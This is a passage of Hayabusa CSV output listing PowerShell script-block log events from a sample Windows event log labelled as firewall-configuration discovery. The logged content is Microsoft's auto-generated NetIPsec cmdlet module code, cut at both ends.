IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeCryptoSet ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.989 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] 